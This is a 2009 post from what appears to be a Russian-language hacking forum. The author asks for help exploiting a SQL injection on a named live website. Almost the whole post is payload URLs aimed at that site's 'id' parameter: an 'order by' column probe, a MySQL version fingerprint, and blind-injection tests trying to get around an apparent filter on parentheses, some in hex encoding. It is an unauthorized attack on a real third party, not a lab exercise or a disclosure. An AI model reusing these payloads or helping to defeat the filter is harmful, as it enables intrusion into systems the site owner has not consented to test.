27.04.2009, 16:20
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Подскажите здесь можно что то зделать, вот sql:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+order+by+9--+
union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ.
БД по всей видимости MySQL:
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+@@global .sort_buffer_size+--+
но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся):
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+1=1--+
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+(1)=1--+
и в hex тоже
http://www.podklyuch.ru/index.php?go=Portfolio&in=page&id=24'+and+%281%29= 1--+
Последний раз редактировалось PaCo; 27.04.2009 в 16:56..
Причина: Грамотей
|
|
|